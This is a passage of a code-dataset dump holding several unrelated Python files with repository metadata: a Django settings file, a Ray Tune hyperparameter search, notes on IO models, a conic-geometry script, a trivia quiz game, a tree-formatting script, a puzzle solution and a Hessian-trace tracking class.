+= 3\n\n print(finalScore)\n \n\n\n","repo_name":"coltrane05/AdventOfCode2022","sub_path":"Day 2/Day2Solution1.py","file_name":"Day2Solution1.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38306300222","text":"DATABASES = {\n \"default\": {\n \"ENGINE\": \"django.contrib.gis.db.backends.postgis\",\n \"NAME\": \"cars\",\n \"USER\": \"carssuper\",\n \"PASSWORD\": \"\",\n \"HOST\": \"localhost\",\n \"PORT\": \"\",\n }\n}\n\nGDAL_LIBRARY_PATH = \"/opt/homebrew/Cellar/gdal/3.6.4_4/lib/libgdal.dylib\"\nGEOS_LIBRARY_PATH = \"/opt/homebrew/Cellar/geos/3.11.2/lib/libgeos_c.dylib\"\n\nDEBUG = True\n\nSQL_LOGGING_ENABLED = False\n\nif SQL_LOGGING_ENABLED:\n LOGGING = {\n \"version\": 1,\n \"filters\": {\n \"require_debug_true\": {\n \"()\": \"django.utils.log.RequireDebugTrue\",\n }\n },\n \"handlers\": {\n \"console\": {\n \"level\": \"DEBUG\",\n \"filters\": [\"require_debug_true\"],\n \"class\": \"logging.StreamHandler\",\n }\n },\n \"loggers\": {\n \"django.db.backends\": {\n \"level\": \"DEBUG\",\n \"handlers\": [\"console\"],\n }\n },\n }\n","repo_name":"pavelkraleu/greenhack-cars","sub_path":"cars/cars/settings/components/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19725883957","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n#################\n# Python imports\n#################\nimport os\nimport time\nimport threading\nimport numpy as np\nfrom tqdm import tqdm as tq\n\n##################\n# Pytorch imports\n##################\nimport torch.nn.functional as F\n\n###############\n# Tune imports\n###############\nimport ray\nfrom hyperopt import hp\nfrom ray.tune.suggest import HyperOptSearch\nfrom ray.tune.schedulers import AsyncHyperBandScheduler\nfrom ray.tune.util import pin_in_object_store, get_pinned_object\nfrom ray.tune import Trainable, run_experiments, register_trainable, Experiment\n\n################\n# local imports\n################\nfrom utils import *\n\n\npinned_obj_dict = {}\n\n\nclass TrainerClass(Trainable):\n def _setup(self, config):\n torch.backends.cudnn.deterministic = True\n 
self.cuda_available = torch.cuda.is_available()\n self.args = get_pinned_object(pinned_obj_dict['args'])\n seed = self.args.seed\n np.random.seed(seed)\n torch.manual_seed(seed)\n if self.cuda_available:\n torch.cuda.manual_seed(seed)\n self.data_loader_train = get_pinned_object(pinned_obj_dict['data_loader_train'])\n self.data_loader_valid = get_pinned_object(pinned_obj_dict['data_loader_valid'])\n print(\"Cuda is available: {}\".format(self.cuda_available))\n self.model = get_model()\n if self.cuda_available:\n self.model.cuda()\n opt = getattr(torch.optim, self.config['optimizer'])\n self.optimizer = opt(self.model.parameters(), lr=self.config['lr'])\n self.batch_accumulation = self.config['batch_accumulation']\n\n def _train_iter(self):\n j = 1\n self.model.train()\n self.optimizer.zero_grad()\n progress_bar = tq(self.data_loader_train)\n progress_bar.set_description(\"Training\")\n avg_loss = 0.0\n for batch_idx, (data, target) in enumerate(progress_bar):\n if self.cuda_available:\n data = data.cuda(non_blocking=True)\n target = target.cuda(non_blocking=True)\n output = self.model(data)\n loss = F.cross_entropy(output, target)\n loss.backward()\n avg_loss += loss.item()\n if j % self.batch_accumulation == 0:\n j = 1\n self.optimizer.step()\n self.optimizer.zero_grad()\n else:\n j += 1\n if batch_idx % self.args.logFrequency == 0:\n progress_bar.set_postfix({'Loss': '{:.3f}'.format(avg_loss/(batch_idx+1))})\n torch.cuda.empty_cache()\n # return avg_loss/len(self.data_loader_train)\n\n def _valid(self):\n self.model.eval()\n avg_loss = 0.0\n avg_acc = 0.0\n n_samples = 0\n progress_bar = tq(self.data_loader_valid)\n progress_bar.set_description(\"Validation\")\n for batch_idx, (data, target) in enumerate(progress_bar):\n if self.cuda_available:\n data = data.cuda(non_blocking=True)\n target = target.cuda(non_blocking=True)\n output = self.model(data)\n loss = F.cross_entropy(output, target)\n avg_loss += loss.item()\n y_hat = output.argmax(dim=1)\n avg_acc += (target == y_hat).sum().item()\n n_samples += len(target)\n if batch_idx % self.args.logFrequency == 0:\n acc = avg_acc / n_samples\n metrics = {\n 'loss': '{:.3f}'.format(avg_loss/(batch_idx+1)),\n 'acc': '{:.2f}%'.format(acc*100)\n }\n progress_bar.set_postfix(metrics)\n loss = avg_loss / len(self.data_loader_valid)\n acc = avg_acc / n_samples\n torch.cuda.empty_cache()\n return {\"loss\": loss, \"acc\": acc}\n\n def _train(self):\n self._train_iter()\n return self._valid()\n\n def _save(self, checkpoint_dir):\n checkpoint_path = os.path.join(checkpoint_dir, \"model.pth\")\n torch.save(self.model.state_dict(), checkpoint_path)\n return checkpoint_path\n\n def _restore(self, checkpoint_path):\n self.model.load_state_dict(checkpoint_path)\n\n\ndef main(args):\n\n ray.init(num_cpus=args.rayNumCpu, num_gpus=args.rayNumGpu)\n\n t_loader, v_loader = get_loaders(train_batch_size=16, num_workers=1, data_folder=args.dataFolder,\n cuda_available=torch.cuda.is_available())\n pinned_obj_dict['data_loader_train'] = pin_in_object_store(t_loader)\n pinned_obj_dict['data_loader_valid'] = pin_in_object_store(v_loader)\n pinned_obj_dict['args'] = pin_in_object_store(args)\n\n trainable_name = 'hyp_search_train'\n register_trainable(trainable_name, TrainerClass)\n\n reward_attr = \"acc\"\n\n #############################\n # Define hyperband scheduler\n #############################\n hpb = AsyncHyperBandScheduler(time_attr=\"training_iteration\",\n reward_attr=reward_attr,\n grace_period=40,\n max_t=300)\n\n ##############################\n # 
Define hyperopt search algo\n ##############################\n space = {\n 'lr': hp.uniform('lr', 0.001, 0.1),\n 'optimizer': hp.choice(\"optimizer\", ['SGD', 'Adam']), #, 'Adadelta']), # Adadelta gets the worst results\n 'batch_accumulation': hp.choice(\"batch_accumulation\", [4, 8, 16])\n }\n hos = HyperOptSearch(space, max_concurrent=4, reward_attr=reward_attr)\n\n #####################\n # Define experiments\n #####################\n exp_name = \"resnet152_hyp_search_hyperband_hyperopt_{}\".format(time.strftime(\"%Y-%m-%d_%H.%M.%S\"))\n exp = Experiment(\n name=exp_name,\n run=trainable_name,\n num_samples=args.numSamples, # the number of experiments\n resources_per_trial={\n \"cpu\": args.trialNumCpu,\n \"gpu\": args.trialNumGpu\n },\n checkpoint_freq=args.checkpointFreq,\n checkpoint_at_end=True,\n stop={\n reward_attr: 0.95,\n \"training_iteration\": args.trainingIteration, # how many times a specific config will be trained\n }\n )\n\n ##################\n # Run tensorboard\n ##################\n if args.runTensorBoard:\n thread = threading.Thread(target=launch_tensorboard, args=[exp_name])\n thread.start()\n launch_tensorboard(exp_name)\n\n ##################\n # Run experiments\n ##################\n run_experiments(exp, search_alg=hos, scheduler=hpb, verbose=False)\n\n\nif __name__ == \"__main__\":\n main(get_args())\n","repo_name":"fvmassoli/hyperparameters-search","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6375475665","text":"# -*- coding:utf-8 -*-\n__author__ = 'Qiushi Huang'\n\n\"\"\"\n所谓同步,就是在发出一个功能调用时,在没有得到结果之前,该调用就不会返回。按照这个定义,其实绝大多数函数都是同步调用。\n 但是一般而言,我们在说同步、异步的时候,特指那些需要其他部件协作或者需要一定时间完成的任务。\n举例:\n1. multiprocessing.Pool下的apply #发起同步调用后,就在原地等着任务结束,根本不考虑任务是在计算还是在io阻塞,总之就是一股脑地等任务结束\n2. concurrent.futures.ProcessPoolExecutor().submit(func,).result()\n3. concurrent.futures.ThreadPoolExecutor().submit(func,).result()\n\n异步的概念和同步相对。当一个异步功能调用发出后,调用者不能立刻得到结果。当该异步功能完成后,通过状态、通知或回调来通知调用者。\n 如果异步功能用状态来通知,那么调用者就需要每隔一定时间检查一次,效率就很低(有些初学多线程编程的人,总喜欢用一个循环去检查某个变量的值,这其实是一种很严重的错误)。\n 如果是使用通知的方式,效率则很高,因为异步功能几乎不需要做额外的操作。至于回调函数,其实和通知没太多区别。\n举例:\n1. multiprocessing.Pool().apply_async() #发起异步调用后,并不会等待任务结束才返回,相反,会立即获取一个临时结果(并不是最终的结果,可能是封装好的一个对象)。\n2. concurrent.futures.ProcessPoolExecutor(3).submit(func,)\n3. concurrent.futures.ThreadPoolExecutor(3).submit(func,)\n\n阻塞调用是指调用结果返回之前,当前线程会被挂起(如遇到io操作)。函数只有在得到结果之后才会将阻塞的线程激活。\n 有人也许会把阻塞调用和同步调用等同起来,实际上他是不同的。对于同步调用来说,很多时候当前线程还是激活的,只是从逻辑上当前函数没有返回而已。\n举例:\n1. 同步调用:apply一个累计1亿次的任务,该调用会一直等待,直到任务返回结果为止,但并未阻塞住(即便是被抢走cpu的执行权限,那也是处于就绪态);\n2. 阻塞调用:当socket工作在阻塞模式的时候,如果没有数据的情况下调用recv函数,则当前线程就会被挂起,直到有数据为止。\n\n非阻塞和阻塞的概念相对应,指在不能立刻得到结果之前也会立刻返回,同时该函数不会阻塞当前线程。\n\n小结:\n1. 同步与异步针对的是函数/任务的调用方式:同步就是当一个进程发起一个函数(任务)调用的时候,一直等到函数(任务)完成,\n 而进程继续处于激活状态。而异步情况下是当一个进程发起一个函数(任务)调用的时候,不会等函数返回,而是继续往下执行当,\n 函数返回的时候通过状态、通知、事件等方式通知进程任务完成。\n2. 
阻塞与非阻塞针对的是进程或线程:阻塞是当请求不能满足的时候就将进程挂起,而非阻塞则不会阻塞当前进程\n\"\"\"\n\"\"\"\n本文讨论的背景是Linux环境下的network IO。\n本文最重要的参考文献是Richard Stevens的“UNIX® Network Programming Volume 1, Third Edition: The Sockets Networking ”,6.2节“I/O Models ”,\nStevens在这节中详细说明了各种IO的特点和区别,如果英文够好的话,推荐直接阅读。Stevens的文风是有名的深入浅出,所以不用担心看不懂。本文中的流程图也是截取自参考文献。\n\nStevens在文章中一共比较了五种IO Model: \n* blocking IO 阻塞I/O\n* nonblocking IO 非阻塞I/O\n* IO multiplexing I/O多路复用\n* signal driven IO 信号驱动I/O\n* asynchronous IO 异步I/O\n由signal driven IO(信号驱动IO)在实际中并不常用,所以主要介绍其余四种IO Model。\n\n\nIO发生时涉及的对象和步骤:\n两个系统对象:\n1)调用IO的process\\ thread\n2)系统内核\nread操作会经历两个阶段:\n1)等待数据准备 (Waiting for the data to be ready)\n2)将数据从内核拷贝到进程中(Copying the data from the kernel to the process)\n\"\"\"","repo_name":"hqs2212586/startMyPython3.0","sub_path":"第七章-并发编程/6 IO模型/01 IO模型.py","file_name":"01 IO模型.py","file_ext":"py","file_size_in_byte":4239,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74106490988","text":"from matplotlib import pyplot as plt\nfrom math import factorial,sqrt,pi,cos,sin\nimport numpy as np\nimport sympy as sym\nfrom sympy.functions.special.tensor_functions import LeviCivita as levi_civita\nimport itertools\nfrom itertools import combinations_with_replacement as repeat_combinations\nimport random\n\nplotmin = -5\nplotmax = 5\ndef get_grid():\n xs = np.linspace(plotmin, plotmax, 500)\n ys = np.linspace(plotmin, plotmax, 500)\n X,Y = np.meshgrid(xs, ys)\n return X,Y\n\ndef multinomial(n, choose):\n # Compute a multinomial coefficient.\n # e.g. multinomial(5, (2,1,2)) gives 30 (5_choose_2 * (5-2)_choose_1 * (5-2-1)_choose_2).\n assert(sum(choose) == n)\n cur = n\n coefficient = 1\n for c in choose:\n coefficient *= sym.binomial(cur, c)\n cur -= c\n return coefficient\n\ndef prod(lis):\n if len(lis) == 0:\n return 1\n t = lis[0]\n for val in lis[1:]:\n t *= val\n return t\n\n\ndef plot_line(l):\n X,Y = get_grid()\n plt.contour(X, Y, l[0]*X + l[1]*Y + l[2], 0)\n\n# ordered_sums(3, 5) will give all triples of sums 0+0+5, 0+1+4, ..., 3+1+1, etc., that add to 5.\ndef ordered_sums(terms, n):\n if terms == 1:\n yield tuple([n])\n return\n for i in range(0, n+1):\n for trailing in ordered_sums(terms-1, n-i):\n yield tuple([i]) + trailing\n\n\n\n\ndef point_point_join(p, q):\n # p: Homogeneous 3-vector.\n # q: Homogeneous 3-vector.\n # Returns: Line p^q represented by a 3x3 antisymmetric matrix.\n matrix = sym.zeros(3,3)\n for i,j in itertools.product(range(3), repeat=2):\n matrix[i,j] = p[i]*q[j] - p[j]*q[i]\n return matrix\n\n# def line_line_intersect(l1, l2):\n# # l1: Line represented by a 3x3 Plucker matrix.\n# # l2: Line represented by a 3x3 Plucker matrix.\n# # Returns: Point 3-vector.\n \n\ndef plucker_to_line(matrix):\n # Convert 3x3 Plucker matrix to 3-vector.\n vector = np.zeros(3)\n for i,j in itertools.product(range(3), repeat=2):\n for k in range(3):\n vector[k] += levi_civita(i,j,k) * matrix[i, j]\n return vector\n\ndef five_point_conic(p,q,r,s,t):\n x,y,z = sym.symbols(\"x y z\")\n monoms = lambda v: [v[i]*v[j] for i,j in repeat_combinations(range(3), 2)]\n M = sym.Matrix([\n *[monoms([*point, 1]) for point in (p,q,r,s,t)],\n monoms((x,y,z))\n ])\n conic_equation = M.det()\n f = sym.lambdify((x, y), conic_equation.subs(z, 1))\n X,Y = get_grid()\n Z = f(X, Y)\n plt.contour(X, Y, Z, 0)\n plt.scatter(*zip(p,q,r,s,t))\n # for var in [x,y]:\n # fprime = sym.lambdify((x,y), sym.diff(conic_equation, var))\n # plt.contour(X, Y, fprime(X,Y), 0)\n\n # Polarize the quadratic form.\n conic_poly = 
conic_equation.as_poly()\n conic_polar = sym.zeros(3,3)\n var = (x,y,z)\n \n for i,j in itertools.product(range(3), repeat=2):\n powers = [0,0,0]\n powers[i] += 1\n powers[j] += 1\n conic_polar[i,j] = conic_poly.coeff_monomial(var[i]*var[j])/multinomial(2,powers)\n return conic_equation, conic_polar\n\n\ndef plot_conic(conic_equation):\n x,y,z = sym.symbols(\"x y z\")\n f = sym.lambdify((x, y), conic_equation.subs(z, 1))\n X,Y = get_grid()\n Z = f(X, Y)\n plt.contour(X, Y, Z, 0)\n\n\ndef conic():\n p = np.array([-1,0])\n q = np.array([2,-1])\n r = np.array([3,2])\n s = np.array([2,2.33])\n t = np.array([1,-1])\n conic_equation, conic_polar = five_point_conic(p,q,r,s,t)\n print(conic_equation)\n print(conic_polar)\n # l = point_point_join(np.array([*p,1]), np.array([*q,1]))\n l = point_point_join(np.array([0,0,1]), np.array([1,1,0]))\n R = l.T*conic_polar*l\n\n lamb = sym.symbols(r\"\\lambda\")\n shifted_minor = R + lamb*l\n shifted_minor.col_del(0)\n shifted_minor.row_del(0)\n lamb_sol = sym.solve(shifted_minor.det(), lamb)[0]\n print(lamb_sol)\n shifted_R = R + lamb_sol*l\n intersects = shifted_R.col(0), shifted_R.row(0)\n intersects = [np.array([inter[0]/inter[2], inter[1]/inter[2]]) for inter in intersects]\n plt.scatter(*zip(*intersects), s=100, c=\"r\")\n\n plot_line(plucker_to_line(l))\n a,b,c = sym.symbols(\"a b c\")\n k = sym.Matrix([a,b,c])\n poly = (l*k).T * conic_polar * (l*k)\n poly = (-poly[0]).expand()\n # The result is a degenerate dual conic. This is a product of two lines,\n # whose dual points are the intersection of the original line with the conic.\n print(poly)\n \n\n \n\n\n# def levi_civita_contraction(num_upper, num_lower, tensor):\n# N = tensor.shape[0]\n# assert(upper == N) #-also must be a square tensor.\n# contracted = np.zeros((N,)*num_lower)\n# for contraction_multiindex in itertools.product(range(N), repeat=num_lower):\n# for multiindex in itertools.product(range(N), repeat=num_upper):\n# contracted[*contraction_multiindex] += levi_civita(*contraction_multiindex)\n# levi_civita()\n \n\n\nconic()\nplt.show()\n","repo_name":"LucasPayne/python_math","sub_path":"line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":4897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35237440622","text":"import random\nimport time\nimport os\nmoney = 0\nx = 1\nquestions_asked = []\n\ndef questions(end): # function that calls the questions\n x = 1\n while x % 2 != 0:\n x = random.randint(0,end)\n return x+1\n\ndef answers(end): # function that varifys the answer\n x = 1\n while x % 2 == 0:\n x = random.randint(0,end)\n return x+1\n\nprint(\" $$$$$$\\ $$\\ $$\\ \") # lines 20 too 36 are an opening visual\ntime.sleep(0.4)\nprint(\"$$ __$$\\ \\__| $$ | \")\ntime.sleep(0.4)\nprint(\"$$ / $$ |$$\\ $$\\ $$\\ $$$$$$$$\\ $$$$$$\\$$$$\\ $$$$$$\\ $$$$$$$\\ $$$$$$\\ $$$$$$\\ $$$$$$\\ \")\ntime.sleep(0.4)\nprint(\"$$ | $$ |$$ | $$ |$$ |\\____$$ |$$ _$$ _$$\\ \\____$$\\ $$ _____|\\_$$ _| $$ __$$\\ $$ __$$\\ \")\ntime.sleep(0.4)\nprint(\"$$ | $$ |$$ | $$ |$$ | $$$$ _/ $$ / $$ / $$ | $$$$$$$ |\\$$$$$$\\ $$ | $$$$$$$$ |$$ | \\__| \")\ntime.sleep(0.4)\nprint(\"$$ $$\\$$ |$$ | $$ |$$ | $$ _/ $$ | $$ | $$ |$$ __$$ | \\____$$\\ $$ |$$\\ $$ ____|$$ | \")\ntime.sleep(0.4)\nprint(\"\\$$$$$$ / \\$$$$$$ |$$ |$$$$$$$$\\ $$ | $$ | $$ |\\$$$$$$$ |$$$$$$$ | \\$$$$ |\\$$$$$$$\\ $$ | \")\ntime.sleep(0.4)\nprint(\" \\___$$$\\ \\______/ \\__|\\________|\\__| \\__| \\__| \\_______|\\_______/ \\____/ \\_______|\\__| 
\")\ntime.sleep(0.4)\nprint(\" \\___| \")\n\nprint(\"welcome to quizmaster! The game where you can become rich by answering questions!\")\nname = input(\"to start, what is your name?\")\nprint(\"welcome to quizmaster \" + name + \"!\")\nplay = input(\"have you been on quizmaster before?\")\nplay = play.lower()\nwhile x == 1: # while statement is used to ensure the user enters either yes or no\n if play == \"yes\":\n input2 = input(\"would you like to import your saved data?\")\n input2 = input2.lower()\n if input2 == \"yes\":\n os.chdir(\"..\")\n os.chdir(\"Questions\")\n q = open(\"saved_data.txt\", \"r\")\n empty = []\n lines2 = q.readlines() # this puts the reading lines function into a new variable\n tt = len(lines2)\n empty.append(lines2[0].strip()) # this line and 55 accesses the index of the lines and adds them to an empty list\n empty.append(lines2[1].strip())\n empty.append(lines2[2].strip())\n for s in range(3,tt): # this block appends the questions that have been previously asked to the questions_asked list based on how many questions there are\n questions_asked.append(lines2[s].strip())\n y = empty[1] # this sets the iteration variable to the value the user was on when they saved the game\n y = int(y) # this converts the value of 'y' which was a string to a int, same idea is used on line 59\n money = empty[2] #this sets the money variable to what they had in their saved data\n money = int(money)\n print(\"great!, welcome back \" + str(empty[0]))\n print(\"you currently have $\" + str(empty[2]) + \"and are on question \" + str(y))\n elif input2 == \"no\":\n print(\"great! our categories you can choose from today are history of Toronto, Toronto sports, and general Toronto Trivia\")\n print(\"also, if at any time you would like to save your progress, type 'save \")\n y = 1 # if the user has no saved data, the iteration variable is set to 1\n else:\n input2 = input(\"would you like to import your saved data?\") # defensive coding\n x = x + 1 # x = x + 1 ends the while loop\n elif play == \"no\":\n print(\"\"\"great! how quiz master works is there are 3 categories of trivia to choose from and for each question you get right, you win money, and for each you get wrong you lose money\"\"\")\n print(\"today, the categories you can choose from are history of Toronto, Toronto sports, and general Toronto Trivia\")\n print(\"if at anytime you want to save your progress, type 'save' \")\n y = 0\n x = x + 1\n else:\n play = input(\"have you been on quizmaster before?\")\nfor y in range(y,10): # y variable in the range is used to load the saved data\n input1 = input(\"which category would you like to choose from? 
(history, sports, or general)\")\n input1 = input1.lower()\n\n if input1 == \"save\":\n print(\"your data will be saved\")\n os.chdir(\"..\")\n os.chdir(\"Questions\")\n try: # try except is used so if the file \"saved_data.txt\" exists, no error happens\n g = open(\"saved_data.txt\", \"x\")\n except:\n g = open(\"saved_data.txt\", \"w\") # lines 86 to 89 save the iteration value, money, and questions asked list to the \"saved_data.txt\" file\n g.write('{}'.format(name) + '\\n')\n g.write('{}'.format(y) + '\\n')\n g.write('{}'.format(money) + '\\n')\n g.write('\\n'.join(questions_asked))\n exit()\n\n if input1 == \"history\":\n print(\"great choice, your question is ...\")\n os.chdir(\"..\")\n os.chdir(\"Questions\")\n f = open(\"History.txt\", \"r\")\n f1 = f.readlines()\n lines = f1\n z = questions(len(lines)) # this takes the questions function and picks an index based on the length of the line * note this logic and all other comments for history section apply to the other sections\n question = lines[z]\n while question in questions_asked: # while loop is used so if a question choosen has been picked, a new one will be pick\n z = questions(len(lines))\n question = lines[z]\n answer = lines[z + 1] # answer is on the next line after the question, so this line accesses the answer\n print(question)\n rr = questions_asked.append(question)\n answer_history = input(\"what is your answer?\").strip()\n answer_history = answer_history.lower()\n if answer_history == answer.strip():\n print(\"correct! you will be awarded $100 for completing that question\")\n money = money + 100\n else:\n print(\"im sorry, that is not correct!\")\n print(\"the correct answer is \" + str(answer))\n money = money - 100\n if money < 0: # this is so the users money cant reach negitive values\n money = money + 100\n\n\n elif input1 == \"sports\":\n os.chdir(\"..\")\n os.chdir(\"Questions\")\n c = open(\"Sports.txt\", \"r\")\n f2 = c.readlines()\n lines = f2\n ty = questions(len(lines))\n question = lines[ty]\n while question in questions_asked:\n ty = questions(len(lines))\n question = lines[ty]\n answer = lines[ty + 1]\n print(question)\n rr = questions_asked.append(question)\n answer_sports = input(\"what is your answer?\").strip()\n answer_sports = answer_sports.lower()\n if answer_sports == answer.strip():\n print(\"correct! you will be awarded $100 for completing that question\")\n money = money + 100\n else:\n print(\"im sorry, that is not correct!\")\n print(\"the correct answer is \" + str(answer))\n money = money - 100\n if money < 0:\n money = money + 100\n\n elif input1 == \"general\":\n print(\"excellent choice, your question is...\")\n os.chdir(\"..\")\n os.chdir(\"Questions\")\n e = open(\"General.txt\", \"r\")\n f3 = e.readlines()\n lines = f3\n ff = questions(len(lines))\n question = lines[ff]\n while question in questions_asked:\n ff = questions(len(lines))\n question = lines[ff]\n answer = lines[ff + 1]\n print(question)\n rr = questions_asked.append(question)\n answer_sports = input(\"what is your answer?\").strip()\n answer_sports = answer_sports.lower()\n if answer_sports == answer.strip():\n print(\"correct! you will be awarded $100 for completing that question\")\n money = money + 100\n else:\n print(\"im sorry, that is not correct!\")\n print(\"the correct answer is \" + str(answer))\n money = money - 100\n if money < 0:\n money = money + 100\n\n else:\n print(\"sorry! \" + input1 + \" isnt a category!\")\n\n\nif money == 0:\n print(\"im sorry! 
you did not win any money\")\nif money >= 100 and money <= 399:\n print(\"congratuations! you did ok! you won $\" + str(money) + \"!\")\nif money >= 400 and money <= 699:\n print(\"congratuations! you did well! you won $\" + str(money) + \"!\")\nif money >= 700 and money <= 999:\n print(\"Congratuations! you did great! you won $\" + str(money) + \"!\")\nif money == 1000:\n print(\"Congratulations! you did amazing you got every question right and won yourself $\" +str(money) + \"!\")","repo_name":"notandrewsimpson/Quzmaster","sub_path":"Quizmaster.py","file_name":"Quizmaster.py","file_ext":"py","file_size_in_byte":8776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32426807569","text":"from ete3 import Tree\nimport sys\nfrom tqdm import tqdm\n\nfn = sys.argv[1]\nprint('Processing', fn)\nprefix = fn[:fn.rfind('.')]\nt = Tree(fn)\nprint('Tree length before:', len(t))\nt.resolve_polytomy(default_dist=1E-10)\nfor n in tqdm(t, total=len(t)):\n n.dist = n.dist + 1E-10\nwith open('%s.hmmufotu.tree' % prefix, 'w') as out:\n out.write(t.write())\nprint('Tree length after:', len(t))\n","repo_name":"jshleap/TA_pipes","sub_path":"format_tree4hmmufotu.py","file_name":"format_tree4hmmufotu.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"42087291652","text":"n, m = map(int, input().split())\narray = [list(input()) for _ in range(n)]\n\ncount = 0\nwhile True:\n result = sum(array[i].count('0') for i in range(n))\n if result == n * m:\n break\n for i in range(n):\n for j in range(m):\n if array[i][j] == '1':\n x, y = i, j\n\n for i in range(x+1):\n for j in range(y+1):\n if array[i][j] == '0':\n array[i][j] = '1'\n else:\n array[i][j] = '0'\n\n count += 1\n\nprint(count)\n\n\n","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/solution626.py","file_name":"solution626.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"2048460099","text":"import fileinput\n\ndef s(row, column, value):\n return 81 * (row - 1) + 9 * (column - 1) + value\n\ndisjunctions = \"\"\n\n# there is at least one number in each entry\nfor x in range(1, 10):\n for y in range(1, 10):\n for z in range(1, 10):\n disjunctions += '{0:d} '.format(s(x, y, z))\n disjunctions += \"0\\n\"\n\n# each number appears at most once in each row\nfor y in range(1, 10):\n for z in range(1, 10):\n for x in range(1, 9):\n for i in range(x + 1, 10):\n disjunctions += '-{0:d} -{1:d} 0\\n'.format(s(x, y, z), s(i, y, z))\n\n# each number appears at most once in each column\nfor x in range(1, 10):\n for z in range(1, 10):\n for y in range(1, 9):\n for i in range(y + 1, 10):\n disjunctions += '-{0:d} -{1:d} 0\\n'.format(s(x, y, z), s(x, i, z))\n\n# each number appears at most once in each 3x3 sub-grid\nfor z in range(1, 10):\n for i in range(0, 3):\n for j in range(0, 3):\n for x in range(1, 4):\n for y in range(1, 4):\n for k in range(y + 1, 4):\n disjunctions += '-{0:d} -{1:d} 0\\n'.format(s(3 * i + x, 3 * j + y, z),\n s(3 * i + x, 3 * j + k, z))\n for k in range(x + 1, 4):\n for l in range(1, 4):\n disjunctions += '-{0:d} -{1:d} 0\\n'.format(s(3 * i + x, 3 * j + y, z),\n s(3 * i + k, 3 * j + l, z))\n\nnumdis = 8829 # minimal encoding will have 8829 disjunctions\n\nfin = fileinput.input('sudokuinput.txt')\nrows = 0\nfor row in fin:\n rows += 1\n col = row.split()\n cols 
= 0\n for val in col:\n cols += 1\n if val != 'x':\n disjunctions += '{:d} 0\\n'.format(s(rows, cols, int(val))) # the given value must be true\n numdis += 1 # add one to the number of disjunctions\n\n\n\nline1 = 'p cnf 729 {0:d}\\n'.format(numdis) # first line is 'p cnf numvars(729) numdis'\nfile = open('sudoku.txt', 'w')\nfile.write(line1 + disjunctions)\nfile.close()\n","repo_name":"seankrummel/LutherCollegeCoursework","sub_path":"CS-260/sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72735568428","text":"\"\"\"Class for tracking the Trace of the Hessian or an approximation thereof.\"\"\"\n\nfrom backpack import extensions\n\nfrom cockpit.quantities.quantity import SingleStepQuantity\n\n\nclass HessTrace(SingleStepQuantity):\n \"\"\"Quantitiy Class tracking the trace of the Hessian during training.\"\"\"\n\n extensions_from_str = {\n \"diag_h\": extensions.DiagHessian,\n \"diag_ggn_exact\": extensions.DiagGGNExact,\n \"diag_ggn_mc\": extensions.DiagGGNMC,\n }\n\n def __init__(self, track_schedule, verbose=False, curvature=\"diag_h\"):\n \"\"\"Initialization sets the tracking schedule & creates the output dict.\n\n Note:\n The curvature options ``\"diag_h\"`` and ``\"diag_ggn_exact\"`` are more\n expensive than ``\"diag_ggn_mc\"``, but more precise. For a classification\n task with ``C`` classes, the former require that ``C`` times more\n information be backpropagated through the computation graph.\n\n Args:\n track_schedule (callable): Function that maps the ``global_step``\n to a boolean, which determines if the quantity should be computed.\n verbose (bool, optional): Turns on verbose mode. Defaults to ``False``.\n curvature (string): Which diagonal curvature approximation should be used.\n Options are ``\"diag_h\"``, ``\"diag_ggn_exact\"``, ``\"diag_ggn_mc\"``.\n \"\"\"\n super().__init__(track_schedule, verbose=verbose)\n\n self._curvature = curvature\n\n def extensions(self, global_step):\n \"\"\"Return list of BackPACK extensions required for the computation.\n\n Args:\n global_step (int): The current iteration number.\n\n Raises:\n KeyError: If curvature string has unknown associated extension.\n\n Returns:\n list: (Potentially empty) list with required BackPACK quantities.\n \"\"\"\n ext = []\n\n if self.should_compute(global_step):\n try:\n ext.append(self.extensions_from_str[self._curvature]())\n except KeyError as e:\n available = list(self.extensions_from_str.keys())\n raise KeyError(f\"Available: {available}\") from e\n\n return ext\n\n def _compute(self, global_step, params, batch_loss):\n \"\"\"Evaluate the trace of the Hessian at the current point.\n\n Args:\n global_step (int): The current iteration number.\n params ([torch.Tensor]): List of torch.Tensors holding the network's\n parameters.\n batch_loss (torch.Tensor): Mini-batch loss from current step.\n\n Returns:\n list: Trace of the Hessian at the current point.\n \"\"\"\n return [\n diag_c.sum().item()\n for diag_c in self._fetch_diag_curvature(\n params, self._curvature, aggregate=False\n )\n ]\n","repo_name":"f-dangel/cockpit","sub_path":"cockpit/quantities/hess_trace.py","file_name":"hess_trace.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":453,"dataset":"github-code","pt":"37"} +{"seq_id":"44215880521","text":"from __future__ import annotations\n\nfrom typing import Any\n\nfrom docutils import nodes\nfrom 
